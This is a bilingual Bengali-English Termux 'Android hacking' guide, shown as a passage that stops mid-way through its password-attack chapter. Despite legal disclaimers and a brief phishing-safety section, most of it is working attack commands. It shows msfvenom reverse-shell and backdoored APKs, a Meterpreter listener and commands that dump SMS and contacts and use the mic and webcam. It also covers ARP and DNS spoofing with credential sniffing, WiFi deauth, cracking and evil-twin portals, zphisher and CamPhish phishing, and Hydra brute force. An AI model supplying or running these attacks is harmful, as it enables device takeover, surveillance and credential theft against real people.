📱

Android Hacking (Termux-based)

Termux দিয়ে Android Hacking — সম্পূর্ণ বাংলা গাইড Android Hacking with Termux — Complete Bilingual Guide

শুধু একটি Android Phone দিয়ে — Network Attack, APK Analysis, Metasploit, WiFi Testing, Post Exploitation এবং আরও অনেক কিছু শিখো। Using just an Android phone — Network attacks, APK Analysis, Metasploit, WiFi testing, Post Exploitation and much more.

hacker@termux:~$ uname -a

Android 14 — Termux v0.119 — ARM64

hacker@termux:~$ pkg install hacking-knowledge

Installing: নেটওয়ার্ক হ্যাকিং + APK রিভার্স + মেটাসপ্লয়েট... Installing: Network Hacking + APK Reverse + Metasploit...

hacker@termux:~$ █

📦 Termux Setup 🌐 Network Attack 📲 APK Analysis 💣 Metasploit 📡 WiFi Hacking 🕵️ OSINT 🔓 Post Exploitation 🔑 Password Attack 🛡️ Hardening 🏆 CTF Labs

📋 বিষয়সূচি — সম্পূর্ণ তালিকা 📋 Table of Contents — Full List

০১ Android Hacking পরিচিতি ও Legal দিকAndroid Hacking Intro & Legal Aspects

কী শেখা যাবে, কেন শিখব, Ethics ও Legal সতর্কতাWhat you'll learn, why learn it, ethics & legal warnings

০২ Termux Setup ও Essential ToolsTermux Setup & Essential Tools

Termux install, pkg system, storage, Python, Go, Ruby setupTermux install, pkg system, storage, Python, Go, Ruby setup

Nethunter, Kali-Termux, Andronix, proot-distro

০৩ Android Architecture ও Security ModelAndroid Architecture & Security Model

Linux Kernel, Binder IPC, SELinux, Sandbox, Permissions

ADB (Android Debug Bridge) — সম্পূর্ণ গাইড

০৪ Network Attacks — MITM, ARP SpoofingNetwork Attacks — MITM, ARP Spoofing

nmap, netdiscover, arpspoof, bettercap, tcpdump, Wireshark

SSL Stripping, DNS Spoofing, HTTP Sniffing

০৫ APK Analysis ও Reverse EngineeringAPK Analysis & Reverse Engineering

apktool, jadx, dex2jar, MobSF — APK decompile করা

Hardcoded secrets, API keys, Manifest analysisHardcoded secrets, API keys, manifest analysis

০৬ Metasploit in Termux — Android ExploitationAndroid Exploitation

Metasploit install, msfvenom payload, msfconsole, sessions

Android APK backdoor, Reverse Shell, Meterpreter

০৭ WiFi Hacking — Wireless AttacksWireless Attacks

aircrack-ng, wifite, hashcat — WPA/WPA2 crack

Evil Twin, Deauth Attack, WPS Pin Attack

০৮ Phishing ও Social EngineeringPhishing & Social Engineering

zphisher, SocialFish, ngrok, cloudflared — credential harvest

SMS Spoofing, QR Code Phishing, Smishing

০৯ OSINT — তথ্য সংগ্রহInformation Gathering

theHarvester, maltego, shodan, sherlock, holehe

Phone OSINT, Email OSINT, Social Media OSINT

১০ Password AttacksPassword Attacks

hydra, medusa, hashcat, john — brute force & cracking

Wordlist generation, CeWL, cupp, crunch

১১ Post Exploitation — Access পাওয়ার পরেAfter Getting Access

Privilege Escalation, Persistence, Data Exfiltration

Covering Tracks, Keylogger, Screenshot, Camera Access

১২ Android Security Hardening — নিজেকে রক্ষা করোAndroid Security Hardening — Protect Yourself

Secure Android phone, Unknown APK, VPN, FirewallSecure Android phone, unknown APKs, VPN, firewall

১৩ CTF Practice ও Lab SetupLab Setup

HackTheBox Android, DIVA, InsecureBankv2, MSTG Crackmes

১৪ Career Path, Resources ও Cheat SheetCareer Path, Resources & Cheat Sheet

সম্পূর্ণ Termux Cheat Sheet, Resources ও Career GuideComplete Termux Cheat Sheet, Resources & Career Guide

Chapter 01

📱 Android Hacking পরিচিতি ও Legal দিকAndroid Hacking Intro & Legal Aspects

কী শেখা যাবে, কেন শিখব, সঠিক Ethics এবং Legal সতর্কতাWhat you'll learn, why learn it, proper ethics and legal warnings

🤔 Android Hacking কী?What is Android Hacking?

Android Hacking মানে Android Device ও Application-এর Security দুর্বলতা খুঁজে বের করা এবং সেগুলো বোঝা। Termux হলো Android-এর একটি Linux Terminal Emulator যা দিয়ে Professional Hacking Tools ব্যবহার করা যায় — কোনো Root ছাড়াই। Android Hacking means finding and understanding security weaknesses in Android devices and applications. Termux is a Linux Terminal Emulator for Android that allows you to use professional hacking tools — even without root.

💡 Termux কেন?Why Termux?

Laptop না থাকলেও Android Phone দিয়েই পুরো Penetration Testing করা সম্ভব। nmap, metasploit, sqlmap, hydra — সব Termux-এ চলে। Even without a laptop, you can do full penetration testing with just an Android phone. nmap, metasploit, sqlmap, hydra — all run in Termux.

⚖️ Legal ও Ethical সতর্কতাWarnings

🚨 অত্যন্ত গুরুত্বপূর্ণExtremely Important

Permission ছাড়া কারো Device, Network বা System hack করা Cybercrime। বাংলাদেশে Digital Security Act 2018-এর অধীনে কঠোর শাস্তি হতে পারে। শুধুমাত্র নিজের Device, নিজের Lab বা CTF-এ Practice করো। Hacking someone's device, network, or system without permission is a cybercrime. In Bangladesh this falls under the Digital Security Act 2018, with severe penalties. Only practice on your own device, your own lab, or CTF challenges.

✅ কোথায় করা যাবেWhere It's Allowed

নিজের Android device ও networkYour own Android device & network
CTF challenges (HackTheBox, TryHackMe)
Vulnerable apps (DIVA, InsecureBank)
Bug Bounty Programs (authorized)
Home Lab environment

❌ যা কখনো করবে নাNever Do This

অন্যের WiFi hack করাHack someone else's WiFi
Public network-এ MITM attackMITM on public networks
Permission ছাড়া APK backdoor তৈরিCreate APK backdoors without permission
Real target-এ attack করাAttack real targets

🎯 কী কী শেখা যাবে এই Guide-এWhat You'll Learn in This Guide

📡 Network

MITM, ARP Spoofing, DNS Spoofing, Packet Sniffing, SSL Strip

📲 APK

Decompile, Reverse Engineer, Find secrets, Modify APK

💣 Exploitation

Metasploit, Payloads, Reverse Shell, Meterpreter sessions

📱 Chapter সারসংক্ষেপChapter Summary

📱 Termux দিয়ে Professional Hacking Tools চালানো সম্ভবProfessional hacking tools can run via Termux
⚖️ শুধু নিজের Lab বা CTF-এ Practice করোOnly practice in your own lab or CTF
🎓 এই Guide সম্পূর্ণ Educational উদ্দেশ্যেThis guide is entirely for educational purposes

Chapter 02

⚙️ Termux Setup ও Essential ToolsTermux Setup & Essential Tools

Termux থেকে Kali Linux পর্যন্ত — সম্পূর্ণ Environment তৈরির গাইডFrom Termux to Kali Linux — complete environment setup guide

📥 Termux Install ও প্রথম SetupTermux Install & First Setup

⚠️ গুরুত্বপূর্ণImportant

Google Play-এর Termux outdated। সবসময় F-Droid থেকে Termux Download করো। f-droid.org → Termux। Termux on Google Play is outdated. Always download Termux from F-Droid. f-droid.org → Termux.

# প্রথমবার Termux খুলে এগুলো করো pkg update && pkg upgrade -y # Essential packages pkg install -y git curl wget python python-pip \ nodejs ruby golang openssh nmap \ net-tools iproute2 dnsutils # Storage permission দাও termux-setup-storage # Python pip update pip install --upgrade pip # Go environment setup export GOPATH=$HOME/go export PATH=$PATH:$GOPATH/bin echo 'export GOPATH=$HOME/go' >> ~/.bashrc echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc

🐉 Kali Linux in Termux (proot-distro)

proot-distro ব্যবহার করে Termux-এর ভেতরে পুরো Kali Linux চালানো যায়। Root ছাড়াই।Using proot-distro, you can run a full Kali Linux inside Termux — even without root.

# proot-distro install করো pkg install proot-distro # Kali Linux install করো (500MB+ download) proot-distro install kali # Kali Linux-এ প্রবেশ করো proot-distro login kali # Kali-তে ঢুকে tools install করো apt update && apt upgrade -y apt install -y nmap metasploit-framework sqlmap \ hydra nikto gobuster subfinder \ aircrack-ng john hashcat # Kali থেকে বেরিয়ে আসতে exit

🔧 Essential Tool InstallationEssential Tool Installation

# Metasploit (সরাসরি Termux-এ) curl https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh -o metasploit.sh chmod +x metasploit.sh && ./metasploit.sh # SQLmap pip install sqlmap # অথবা git clone https://github.com/sqlmapproject/sqlmap.git cd sqlmap && python sqlmap.py --version # Hydra (password brute force) pkg install hydra # Nmap pkg install nmap # Netcat pkg install netcat-openbsd # theHarvester (OSINT) pip install theHarvester # Sherlock (username OSINT) git clone https://github.com/sherlock-project/sherlock.git cd sherlock && pip install -r requirements.txt

📂 Termux File System বোঝাUnderstanding Termux File System

Termux Home Directory: /data/data/com.termux/files/home (~) Termux Prefix: /data/data/com.termux/files/usr Android Storage: ~/storage/shared (/sdcard) Downloads: ~/storage/downloads Important paths: ~/storage/shared/ → Phone-এর Internal Storage ~/storage/downloads/ → Download Folder ~/.bashrc → Startup script (custom aliases) ~/.ssh/ → SSH keys

⚡ Useful Aliases SetupUseful Aliases Setup

# ~/.bashrc এ add করো nano ~/.bashrc # Add these aliases: alias kali='proot-distro login kali' alias update='pkg update && pkg upgrade -y' alias tools='ls ~/tools/' alias myip='curl ifconfig.me' alias localip='ip addr show | grep inet' alias scan='nmap -sV -sC' alias msf='cd ~/metasploit-framework && ruby msfconsole' # Apply করো source ~/.bashrc

⚙️ Chapter সারসংক্ষেপChapter Summary

📥 F-Droid থেকে Termux Download করো — Play Store নয়Download Termux from F-Droid — not Play Store
🐉 proot-distro দিয়ে Kali Linux চালাও — Root ছাড়াRun Kali Linux via proot-distro — no root needed
🔧 nmap, metasploit, hydra, sqlmap — সব Termux-এ চলেnmap, metasploit, hydra, sqlmap — all run in Termux

Chapter 03

🏗️ Android Architecture ও ADBAndroid Architecture & ADB

Android-এর ভেতরের Structure বোঝা এবং ADB দিয়ে Device Control করাUnderstanding Android's internal structure and controlling devices with ADB

🏗️ Android ArchitectureAndroid Architecture

┌─────────────────────────────────────────────┐ │ APPLICATIONS LAYER │ │ (Instagram, WhatsApp, Banking App, etc) │ ├─────────────────────────────────────────────┤ │ APPLICATION FRAMEWORK │ │ (Activity Manager, Package Manager, │ │ Content Providers, Notification Manager) │ ├─────────────────────────────────────────────┤ │ ANDROID RUNTIME + NATIVE LIBRARIES │ │ (ART/Dalvik JVM, WebKit, SQLite) │ ├─────────────────────────────────────────────┤ │ LINUX KERNEL │ │ (Drivers, Power Mgmt, SELinux, Binder) │ └─────────────────────────────────────────────┘

🔌 ADB — Android Debug Bridge

ADB হলো Android-এর সাথে Computer বা অন্য Android Device-এর communication tool। এটা Hacker-দের জন্য অত্যন্ত শক্তিশালী।ADB is a communication tool between Android and a computer or another Android device. It's extremely powerful for hackers.

# Termux-এ ADB install pkg install android-tools # Device connect করো (USB বা WiFi) adb devices # connected devices list adb connect 192.168.1.100:5555 # WiFi ADB # File operations adb push local_file.txt /sdcard/ # phone-এ file পাঠাও adb pull /sdcard/file.txt ./ # phone থেকে file নাও # Shell access adb shell # interactive shell adb shell ls /data/data/ # app data (root needed) adb shell dumpsys battery # system info # APK Management adb install app.apk # APK install adb uninstall com.package.name # uninstall app adb shell pm list packages # সব apps list adb shell pm list packages -3 # শুধু 3rd party apps # Screen capture adb shell screencap /sdcard/screen.png adb pull /sdcard/screen.png ./ # Network info adb shell netstat -an adb shell ip addr show

🔒 Android Security Model

🛡️ Security Features

SELinux — Mandatory Access ControlMandatory Access Control
Sandbox — প্রতিটি App isolatedEach app isolated
Permissions — Runtime permission systemRuntime permission system
Keystore — Hardware-backed key storageHardware-backed key storage
Play Protect — Malware detectionMalware detection

⚠️ Common Weaknesses

Hardcoded API keys in APK
Insecure data storage (/sdcard)
Unencrypted SQLite databases
Exported Activities/Services
Insecure WebView implementations
Weak SSL/TLS certificate validation

🏗️ Chapter সারসংক্ষেপChapter Summary

🔌 ADB = Android Hacker-এর Swiss Army KnifeADB = Android Hacker's Swiss Army Knife
🏗️ Android Architecture জানলে কোথায় Bug খুঁজতে হবে বোঝা যায়Knowing Android architecture shows where to look for bugs
🔒 SELinux + Sandbox — ভাঙা কঠিন কিন্তু Misconfig সহজSELinux + Sandbox — hard to break, but misconfig is easy

Chapter 04

🌐 Network Attacks — MITM, ARP Spoofing

Local Network-এ আক্রমণ — Termux দিয়ে নেটওয়ার্ক হ্যাকিংAttacking local networks — network hacking with Termux

🗺️ Network ScanningNetwork Scanning

# নিজের IP খুঁজে বের করো ip addr show wlan0 ifconfig wlan0 # Network-এ সব Device খোঁজো (nmap) nmap -sn 192.168.1.0/24 # Host discovery nmap -sV -sC 192.168.1.100 # Service detection nmap -p- --min-rate 5000 192.168.1.100 # All ports nmap -O 192.168.1.100 # OS detection # netdiscover (ARP-based discovery) pkg install netdiscover netdiscover -r 192.168.1.0/24 # Output example: 192.168.1.1 00:11:22:33:44:55 Router (TP-Link) 192.168.1.100 AA:BB:CC:DD:EE:FF Samsung Galaxy 192.168.1.101 11:22:33:44:55:66 HP Laptop

🎭 ARP Spoofing ও MITM Attack

⚠️ শুধু নিজের Network-এ Test করোOnly test on your own network

ARP Spoofing করলে Network-এর Traffic তোমার Device-এর মধ্য দিয়ে যায়। এটা শুধু নিজের Lab-এ করো। ARP Spoofing routes network traffic through your device. Only do this in your own lab.

# arpspoof install pkg install dsniff # IP Forwarding চালু করো echo 1 > /proc/sys/net/ipv4/ip_forward # (root লাগতে পারে) sysctl -w net.ipv4.ip_forward=1 # ARP Spoofing শুরু করো (দুটো terminal-এ) # Terminal 1: Router-কে বলো victim তুমি arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1 # Terminal 2: Victim-কে বলো Router তুমি arpspoof -i wlan0 -t 192.168.1.1 192.168.1.100 # Packet Sniffing (tcpdump) tcpdump -i wlan0 -w capture.pcap tcpdump -i wlan0 host 192.168.1.100 tcpdump -i wlan0 port 80 -A # HTTP traffic (plaintext)

🔧 Bettercap — শক্তিশালী MITM ToolPowerful MITM Tool

# Bettercap install (Kali in Termux) apt install bettercap # Bettercap interactive mode bettercap -iface wlan0 # Bettercap commands: net.probe on # network scan শুরু net.show # সব device দেখাও set arp.spoof.targets 192.168.1.100 arp.spoof on # MITM শুরু net.sniff on # Traffic capture শুরু http.proxy on # HTTP proxy চালু https.proxy on # HTTPS proxy (SSL strip) # Credential harvesting set net.sniff.verbose true set net.sniff.filter "port 80 or port 443"

📡 DNS Spoofing

# DNS Spoofing config file তৈরি cat > dns_spoof.conf << 'EOF' *.facebook.com 192.168.1.X # Attacker IP *.google.com 192.168.1.X EOF # Bettercap-এ DNS Spoof set dns.spoof.domains facebook.com,google.com set dns.spoof.address 192.168.1.X # Your IP dns.spoof on

🌐 Chapter সারসংক্ষেপChapter Summary

🗺️ nmap দিয়ে Network Scan করো — সব Device খুঁজে বের করোScan networks with nmap — find all devices
🎭 ARP Spoof = Traffic তোমার মধ্য দিয়ে পাঠানোARP Spoof = route traffic through you
🔧 Bettercap = সেরা MITM FrameworkBettercap = best MITM framework

Chapter 05

📲 APK Analysis ও Reverse Engineering

Android App-এর ভেতরে কী আছে দেখো — Secret খুঁজে বের করোSee what's inside Android apps — find hidden secrets

🔍 APK কী এবং কীভাবে কাজ করে?What is an APK and How Does It Work?

APK File Structure: app.apk (actually a ZIP file) ├── AndroidManifest.xml ← Permissions, Components, Export ├── classes.dex ← Compiled Java/Kotlin code ├── res/ ← Resources (images, strings) ├── assets/ ← Raw files (often has API keys!) ├── lib/ ← Native .so libraries └── META-INF/ ← Signature files

🛠️ APK Decompile করা — apktool

# apktool install pkg install apktool # অথবা pip install apktool # APK Decompile করো apktool d app.apk -o output_folder # Decompiled Structure: output_folder/ ├── AndroidManifest.xml ← এটা সবার আগে পড়ো! ├── smali/ ← Decompiled code (Smali bytecode) ├── res/ │ ├── values/strings.xml ← API keys এখানে থাকে! │ └── raw/ └── assets/ ← Hardcoded credentials! # AndroidManifest.xml এ কী দেখবে? cat output_folder/AndroidManifest.xml | grep -i "exported\|permission\|debuggable" # Sensitive strings খোঁজো grep -ri "api_key\|apikey\|password\|secret\|token\|aws\|firebase" output_folder/ grep -ri "http://\|https://" output_folder/res/values/strings.xml

☕ jadx — Java Code দেখা

# jadx install (Termux/Kali) apt install jadx # Kali-তে # অথবা GitHub থেকে download করো wget https://github.com/skylot/jadx/releases/latest/download/jadx-1.5.0.zip unzip jadx-1.5.0.zip -d jadx/ # APK থেকে Java code বের করো jadx -d output_dir app.apk # Interesting class খোঁজো find output_dir -name "*.java" | xargs grep -l "password\|secret\|key" # Network calls খুঁজো grep -r "OkHttp\|Retrofit\|HttpURLConnection\|URL(" output_dir/ | head -20 # Firebase config খোঁজো grep -r "firebaseapp\|firebase\|google-services" output_dir/

📋 AndroidManifest.xml AnalysisAndroidManifest.xml Analysis

# Dangerous permissions চেক করো grep -E "READ_SMS|READ_CONTACTS|ACCESS_FINE_LOCATION|CAMERA|RECORD_AUDIO" \ AndroidManifest.xml # Exported Activities (access without auth!) grep 'android:exported="true"' AndroidManifest.xml # Debuggable app (major security flaw) grep 'android:debuggable="true"' AndroidManifest.xml # ADB দিয়ে Exported Activity launch করো adb shell am start -n com.package/.ExportedActivity # Content Provider test করো adb shell content query --uri content://com.package.provider/data

🔐 Static Analysis ChecklistStatic Analysis Checklist

✅ APK Analysis-এ কী কী দেখবেWhat to Check in APK Analysis

☐ android:debuggable="true" — Debug mode চালু?Debug mode on?
☐ android:allowBackup="true" — Backup allow?Backup allowed?
☐ Hardcoded API keys/passwords in strings.xmlHardcoded API keys/passwords in strings.xml
☐ Exported Activities ও ServicesExported Activities and Services
☐ HTTP (not HTTPS) endpointsHTTP (not HTTPS) endpoints
☐ Insecure SSL/TLS (certificate pinning missing)Insecure SSL/TLS (certificate pinning missing)
☐ Sensitive data stored in SharedPreferencesSensitive data stored in SharedPreferences

📲 Chapter সারসংক্ষেপChapter Summary

🔍 APK = ZIP file — apktool দিয়ে unzip করোAPK = ZIP file — unzip it with apktool
☕ jadx দিয়ে Java code পড়ো — API keys খোঁজোRead Java code with jadx — search for API keys
📋 AndroidManifest.xml = Bug Hunter-এর গুপ্তধনAndroidManifest.xml = bug hunter's treasure chest

Chapter 06

💣 Metasploit in Termux — Android Exploitation

Android APK Backdoor তৈরি, Reverse Shell এবং Meterpreter SessionCreating Android APK backdoors, reverse shells, and Meterpreter sessions

🔴 শুধু নিজের Device-এ Test করোOnly Test on Your Own Device

এই Chapter-এর সব Content শুধু Educational। নিজের Device বা Lab-এ Test করো। অন্যের Device-এ করলে Cybercrime। All content in this chapter is educational only. Test on your own device or lab. Doing it on others' devices is a cybercrime.

⚙️ Metasploit Setup in Termux

# Method 1: Kali in proot-distro proot-distro login kali apt install metasploit-framework msfconsole # Method 2: Direct Termux script pkg install unstable-repo pkg install metasploit # Metasploit Database setup msfdb init msfconsole # Basic msfconsole commands msf6 > help # সব command দেখো msf6 > search android # Android modules খোঁজো msf6 > use exploit/multi/handler # Listener চালু করো

🎭 msfvenom — Android APK Payload তৈরি

# Android Reverse Shell APK তৈরি msfvenom -p android/meterpreter/reverse_tcp \ LHOST=192.168.1.X \ LPORT=4444 \ -o evil_app.apk # Legitimate APK-এর সাথে Backdoor Inject msfvenom -p android/meterpreter/reverse_tcp \ LHOST=192.168.1.X \ LPORT=4444 \ -x original_app.apk \ -o backdoored_app.apk # HTTPS payload (more stealthy) msfvenom -p android/meterpreter/reverse_https \ LHOST=your_domain.com \ LPORT=443 \ -o secure_payload.apk # Stageless payload (no internet needed) msfvenom -p android/meterpreter_reverse_tcp \ LHOST=192.168.1.X \ LPORT=4444 \ -o stageless.apk

🎧 Listener Setup — Session পাওয়া

# msfconsole-এ Listener চালু করো msfconsole -q msf6 > use exploit/multi/handler msf6 exploit(handler) > set payload android/meterpreter/reverse_tcp msf6 exploit(handler) > set LHOST 192.168.1.X msf6 exploit(handler) > set LPORT 4444 msf6 exploit(handler) > set ExitOnSession false msf6 exploit(handler) > exploit -j # Victim APK install করলে session আসবে: [*] Started reverse TCP handler on 192.168.1.X:4444 [*] Sending stage (65536 bytes) to 192.168.1.101 [*] Meterpreter session 1 opened # Session-এ ঢোকো msf6 > sessions -l # সব sessions দেখো msf6 > sessions -i 1 # Session 1-এ ঢোকো

🔮 Meterpreter Commands — Android Control

# System Information meterpreter > sysinfo # Device info meterpreter > getuid # Current user meterpreter > pwd # Current directory # File System meterpreter > ls # List files meterpreter > download /sdcard/DCIM/photo.jpg ./ meterpreter > upload local.txt /sdcard/ # Android-specific commands meterpreter > dump_sms # SMS পড়ো meterpreter > dump_contacts # Contacts নাও meterpreter > geolocate # GPS location meterpreter > record_mic 10 # Microphone record (10 sec) meterpreter > webcam_snap # Camera snap meterpreter > send_sms -d +8801XXXXXXXXX -t "Test" # SMS পাঠাও # Network meterpreter > ifconfig meterpreter > route meterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.1 # Shell access meterpreter > shell # Android shell

💣 Chapter সারসংক্ষেপChapter Summary

⚙️ Kali in proot-distro = সহজে MetasploitKali in proot-distro = easy Metasploit
🎭 msfvenom = APK Payload তৈরির toolmsfvenom = tool for creating APK payloads
🔮 Meterpreter = Remote Device ControlMeterpreter = remote device control

Chapter 07

📡 WiFi Hacking — Wireless Attacks

WPA/WPA2 Crack, Evil Twin, Deauth — Wireless Network Security TestingWPA/WPA2 Crack, Evil Twin, Deauth — Wireless Network Security Testing

⚠️ WiFi Hacking-এর জন্য External WiFi Adapter লাগবেWiFi Hacking Requires an External WiFi Adapter

Android-এর built-in WiFi Monitor Mode support করে না। External USB WiFi Adapter (OTG) লাগবে যেটা Monitor Mode ও Packet Injection support করে। যেমন: Alfa AWUS036ACH। Android's built-in WiFi doesn't support Monitor Mode. You need an external USB WiFi adapter (OTG) that supports Monitor Mode and Packet Injection. Example: Alfa AWUS036ACH.

📡 WiFi Reconnaissance

# WiFi interface খুঁজো ip link show iwconfig # Monitor Mode চালু করো airmon-ng start wlan0 # Interface হবে wlan0mon # Nearby WiFi networks scan করো airodump-ng wlan0mon # Specific network-এর packets capture করো airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF \ -w capture wlan0mon # -c = channel, --bssid = Router MAC, -w = output file # Output: BSSID PWR CH #Data ESSID AA:BB:CC:DD:EE:FF -60 6 12 HomeWiFi 11:22:33:44:55:66 -75 11 5 OfficeNet

💥 WPA/WPA2 Handshake Capture ও Crack

# Deauth attack — Client disconnect করো (Handshake নেওয়ার জন্য) aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon # Client reconnect করলে Handshake পাওয়া যাবে # Handshake Capture confirmation: [*] WPA handshake: AA:BB:CC:DD:EE:FF ← সফল! # Dictionary Attack দিয়ে crack করো aircrack-ng -w /usr/share/wordlists/rockyou.txt \ -b AA:BB:CC:DD:EE:FF capture-01.cap # hashcat দিয়ে GPU crack (faster) hcxdumptool -i wlan0mon -o capture.pcapng hcxpcapngtool -o hash.hc22000 capture.pcapng hashcat -m 22000 hash.hc22000 rockyou.txt # WPS Pin Attack (যদি WPS চালু থাকে) wash -i wlan0mon # WPS-enabled networks reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

😈 Evil Twin Attack

# Fake Access Point তৈরি করো # hostapd config file cat > fake_ap.conf << 'EOF' interface=wlan0 driver=nl80211 ssid=HomeWiFi # Same name as victim AP channel=6 hw_mode=g EOF hostapd fake_ap.conf # DHCP Server চালু করো dnsmasq --interface=wlan0 \ --dhcp-range=192.168.2.2,192.168.2.100,255.255.255.0,12h \ --no-daemon # Captive Portal (credential capture) # Simple Python HTTP server python3 -m http.server 80 --directory phishing_page/

📡 Chapter সারসংক্ষেপChapter Summary

📡 Monitor Mode-এর জন্য External WiFi Adapter লাগবেExternal WiFi adapter needed for monitor mode
💥 aircrack-ng = WPA Handshake capture ও crackaircrack-ng = WPA handshake capture and crack
😈 Evil Twin = Fake AP দিয়ে credential চুরিEvil Twin = steal credentials with fake AP

Chapter 08

🎣 Phishing ও Social EngineeringPhishing & Social Engineering

Termux দিয়ে Phishing Page তৈরি, URL Tunneling এবং Credential HarvestingCreating phishing pages with Termux, URL tunneling, and credential harvesting

🔗 ngrok ও cloudflared — Public URL পাওয়াGetting a Public URL

# ngrok install pkg install wget unzip wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-arm64.tgz tar xvzf ngrok-v3-stable-linux-arm64.tgz chmod +x ngrok && mv ngrok $PREFIX/bin/ # ngrok account-এ signup করো (free) ngrok config add-authtoken YOUR_TOKEN # HTTP server চালু করো python3 -m http.server 8080 # ngrok দিয়ে public করো ngrok http 8080 # Output: https://abc123.ngrok.io → localhost:8080 # cloudflared (alternative, no account needed) pkg install cloudflared cloudflared tunnel --url http://localhost:8080

🎣 zphisher — Phishing ToolPhishing Tool

# zphisher install git clone https://github.com/htr-tech/zphisher.git cd zphisher chmod +x zphisher.sh bash zphisher.sh # zphisher menu থেকে select করো: 01) Facebook 02) Instagram 03) Google 04) Twitter 05) Netflix 06) PayPal 07) Steam 08) TikTok 09) Spotify ...আরও অনেক... # Phishing URL পাওয়া যাবে: URL 1: https://is.gd/xxxxxxx (Shortened) URL 2: https://abc123.ngrok.io (ngrok) # Victim enter করলে: [*] Victim IP: 192.168.1.100 [*] Username: victim@email.com [*] Password: password123

📱 Camphish — Camera দিয়ে Location নেওয়াGetting Location via Camera

# CamPhish install git clone https://github.com/techchipnet/CamPhish.git cd CamPhish && bash camphish.sh # কীভাবে কাজ করে: # 1. একটি fake webpage তৈরি হয় # 2. Victim-কে link পাঠানো হয় # 3. Page খুললে Camera permission চাওয়া হয় # 4. Permission দিলে photo তোলা হয় ও GPS location পাওয়া যায়

📧 Phishing থেকে বাঁচার উপায়How to Stay Safe from Phishing

🚨 Phishing চেনার উপায়How to Identify Phishing

URL টা সঠিক কিনা দেখো (facebook.com vs faceb00k.com)Check if URL is correct (facebook.com vs faceb00k.com)
HTTPS আছে কিনা দেখোCheck if HTTPS is present
Unexpected login page সন্দেহজনকUnexpected login pages are suspicious

🛡️ নিরাপদ থাকার উপায়Ways to Stay Safe

2FA/MFA চালু রাখোEnable 2FA/MFA
Password Manager ব্যবহার করোUse a password manager
Unknown link-এ click করো নাDon't click unknown links

🎣 Chapter সারসংক্ষেপChapter Summary

🔗 ngrok/cloudflared = Local server-কে Public URL দেওয়াngrok/cloudflared = give local server a public URL
🎣 zphisher = Ready-made Phishing Pageszphisher = ready-made phishing pages
🛡️ 2FA + URL check = Phishing থেকে সুরক্ষা2FA + URL check = protection from phishing

Chapter 09

🕵️ OSINT — তথ্য সংগ্রহInformation Gathering

Termux দিয়ে Phone, Email, Username ও Social Media OSINTPhone, Email, Username, and Social Media OSINT with Termux

🔍 Username OSINT — Sherlock

# Sherlock — Username একসাথে 400+ সাইটে খোঁজো git clone https://github.com/sherlock-project/sherlock.git cd sherlock && pip install -r requirements.txt # Username search python3 sherlock username123 # Multiple usernames python3 sherlock user1 user2 user3 # Output: [+] Twitter: https://twitter.com/username123 [+] Instagram: https://instagram.com/username123 [+] GitHub: https://github.com/username123 [+] Reddit: https://reddit.com/user/username123 [-] Facebook: Not Found

📧 Email OSINT — holehe

# holehe — Email কোন কোন সাইটে Registered pip install holehe holehe target@email.com # Output: [+] google.com - Email used [+] facebook.com - Email used [+] twitter.com - Email used [-] github.com - Email not used [+] instagram.com - Email used # theHarvester — Email, Domain OSINT pip install theHarvester theHarvester -d target.com -b google,bing,linkedin

📱 Phone Number OSINT

# phoneinfoga — Phone number OSINT pkg install golang go install github.com/sundowndev/phoneinfoga/v2/cmd/phoneinfoga@latest phoneinfoga scan -n "+8801XXXXXXXXX" # Output: Number: +8801XXXXXXXXX Country: Bangladesh Carrier: Grameenphone Line Type: Mobile Valid: true # OsintFramework-এর Phone lookup: # truecaller.com, sync.me, whitepages.com

🌐 Website/Domain OSINT

# WHOIS lookup whois target.com # DNS records nslookup target.com dig target.com ANY dig target.com MX # Mail servers dig target.com TXT # TXT records (often has juicy info) # Reverse IP (other sites on same server) curl "https://api.hackertarget.com/reverseiplookup/?q=IP_HERE" # Shodan (Internet-connected device search) pip install shodan shodan init YOUR_API_KEY shodan host IP_ADDRESS shodan search "target.com" # Wayback Machine (old versions of website) curl "http://archive.org/wayback/available?url=target.com"

🕵️ Chapter সারসংক্ষেপChapter Summary

👤 Sherlock = Username 400+ সাইটে একসাথে খোঁজোSherlock = search username on 400+ sites at once
📧 holehe = Email কোন কোন সাইটে আছে জানোholehe = find which sites use an email
🌐 Shodan = Internet-এর Google for HackersShodan = internet's Google for hackers

Chapter 10

🔑 Password Attacks

Brute Force, Dictionary Attack, Hash Cracking — Termux দিয়েBrute Force, Dictionary Attack, Hash Cracking — with Termux

📚 Wordlist তৈরি করাCreating Wordlists

# rockyou.txt (সবচেয়ে popular wordlist) # Kali-তে already থাকে ls /usr/share/wordlists/ gunzip /usr/share/wordlists/rockyou.txt.gz # cupp — Custom wordlist (target-এর info দিয়ে) pip install cupp cupp -i # Name, Birthday, Partner, Pet name input দাও # Output: custom_wordlist.txt (thousands of variations) # crunch — Pattern-based wordlist pkg install crunch crunch 8 8 0123456789 -o numeric_8.txt # 8-digit numbers only crunch 6 10 abcdefgh -o alpha.txt # 6-10 char alphabet # CeWL — Website থেকে wordlist তৈরি gem install cewl cewl https://target.com -d 2 -m 5 -w wordlist.txt

💥 Hydra — Network Brute Force

# SSH Brute Force hydra -l admin -P rockyou.txt ssh://192.168.1.100 hydra -L users.txt -P passwords.txt ssh://192.168.1.100 # FTP Brute Force hydra -l admin -P passwords.txt ftp://192.168.1.100 # HTTP Login Form hydra -l admin -P rockyou.txt 192.168.1.100 \ http-post-form "/login:username=^USER^&password=^PASS^:Invalid" # WordPress Login hydra -l admin -P rockyou.txt \ 192.168.1.100 http-post-form \ "/wp-login.php:log=^USER^&pwd=^PASS^:incorrect" # MySQL hydra -l root -P passwords.txt 192.168.1.100 mysql # Speed control (Rate limiting bypass) hydra -l admin -P rockyou.txt -t 4 -W 2 ssh://192.168.1.100 # -t = threads, -W = wait seconds

🔓 Hash Cracking — hashcat ও john

